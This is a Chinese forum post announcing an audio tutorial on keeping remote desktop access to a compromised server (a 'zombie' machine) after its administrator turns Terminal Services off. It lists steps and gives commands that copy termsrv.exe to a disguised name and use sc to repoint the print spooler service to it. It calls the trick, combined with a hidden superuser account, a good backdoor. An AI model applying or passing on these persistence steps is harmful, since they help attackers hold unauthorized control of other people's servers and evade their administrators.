投稿:3389终端服务替换教程(语音)

教程名称:终端服务替换教程 主讲:低调小飞

说明：当我们拥有一台远程服务器时，如果是自己为对方开放了3389，那么如果管理员查看到3389服务开启，那么他就会把服务关闭，那样我们就无法再次去连接我们的肉鸡，今天就来讲下替换服务法，这样就算管理员把终端服务关闭我们仍然能够连接到我们的肉鸡。

操作步骤：

1.記下要修改各項文件的絕對名称

2.修改註冊表

3.修改服務名稱

4.copy文件

5.用工具sc修改服務項

6.連接測試

C:\WINNT\System32\termsrv.exe

C:\WINNT\System32\ismserv.exe

copy termsrv.exe prints.exe

sc \\127.0.0.1 config spooler binpath= c:\winnt\system32\prints.exe

总结:用此方法再结合我上节课说的手动添加超级隐藏帐户，可以说就是一个很好的后门手段了。那么在肉鸡上的一些保护自己的安全设置我在以后也会讲到。